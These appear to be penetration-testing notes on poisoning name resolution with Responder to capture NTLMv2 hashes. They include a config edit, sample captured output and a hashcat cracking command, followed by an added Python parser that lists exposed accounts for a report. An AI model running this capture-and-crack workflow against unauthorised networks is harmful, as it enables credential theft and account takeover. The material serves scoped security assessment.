To capture password hashes locally, we can use Responder.
Responder can be limited to answering only the IPs that are within scope. Open the file below and change the line as described.

```
$ nano /etc/responder/Responder.conf
RespondTo = <ip>,<ip>...
```
With that in place we capture some hashes:

```
[SMB] NTLMv2-SSP Client : 172.16.1.253
[SMB] NTLMv2-SSP Username : ORIONSCORP2\rlourdes
[SMB] NTLMv2-SSP Hash : rlourdes::ORIONSCORP2:ed1616c10528b2b...
```
The whole hash string can be fed to hashcat or john for cracking:

```
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force
```
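As an added example (not part of the original notes), a small Python parser for the Responder output shown above: it pairs each `Client` line with the following `Hash` line, validates the colon-separated NetNTLMv2 layout that hashcat mode 5600 expects, skips malformed lines, and lists which accounts were exposed from which hosts, which is what ends up in the report and the password-reset list. The log lines, IPs, account names and hex values are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample of Responder console output; IPs, names and hex values are made up.
SAMPLE_LOG = """\
[SMB] NTLMv2-SSP Client   : 10.0.0.25
[SMB] NTLMv2-SSP Username : EXAMPLE\\alice
[SMB] NTLMv2-SSP Hash     : alice::EXAMPLE:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000aabbccdd
[HTTP] NTLMv2 Client   : 10.0.0.40
[HTTP] NTLMv2 Username : EXAMPLE\\alice
[HTTP] NTLMv2 Hash     : alice::EXAMPLE:99aabbccddeeff00:0f1e2d3c4b5a69788796a5b4c3d2e1f0:0101000000000000aabbccdd
[SMB] NTLMv2-SSP Hash     : not-a-valid-netntlmv2-string
"""

CLIENT_RE = re.compile(r"^\[(?P<proto>\w+)\] NTLMv2(?:-SSP)? Client\s*:\s*(?P<ip>\S+)")
# NetNTLMv2 layout as printed by Responder and consumed by hashcat -m 5600:
# user::domain:server_challenge(16 hex):hmac_md5(32 hex):ntlmv2_blob(hex)
HASH_RE = re.compile(
    r"^\[(?P<proto>\w+)\] NTLMv2(?:-SSP)? Hash\s*:\s*"
    r"(?P<user>[^:]+)::(?P<domain>[^:]*):"
    r"(?P<chal>[0-9a-fA-F]{16}):(?P<hmac>[0-9a-fA-F]{32}):(?P<blob>[0-9a-fA-F]+)\s*$"
)


@dataclass(frozen=True)
class Capture:
    proto: str
    client_ip: str
    domain: str
    user: str
    netntlmv2: str  # the full colon-separated string, unchanged


def parse_responder_log(text: str) -> list[Capture]:
    """Pair each Client line with the next well-formed Hash line on the same listener."""
    captures: list[Capture] = []
    last_client: dict[str, str] = {}  # listener (SMB, HTTP, ...) -> most recent client IP
    for line in text.splitlines():
        if m := CLIENT_RE.match(line):
            last_client[m["proto"]] = m["ip"]
        elif m := HASH_RE.match(line):  # malformed hash lines simply do not match
            captures.append(Capture(m["proto"], last_client.get(m["proto"], "unknown"),
                                    m["domain"], m["user"], line.split(":", 1)[1].strip()))
    return captures


def exposed_accounts(captures: list[Capture]) -> dict[tuple[str, str], set[str]]:
    """Map (DOMAIN, user) to the set of hosts whose responses were captured."""
    seen: dict[tuple[str, str], set[str]] = {}
    for c in captures:
        seen.setdefault((c.domain.upper(), c.user.lower()), set()).add(c.client_ip)
    return seen
```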